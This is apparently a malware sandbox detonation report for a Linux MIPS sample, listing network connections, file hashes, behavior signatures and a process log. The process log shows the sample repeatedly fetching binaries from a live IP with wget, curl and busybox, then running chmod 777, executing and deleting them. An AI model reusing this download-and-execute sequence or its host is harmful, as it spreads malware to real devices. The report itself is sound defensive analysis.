[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

debian9-mipsel-20240729-en

Max time kernel

119s

Max time network

120s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

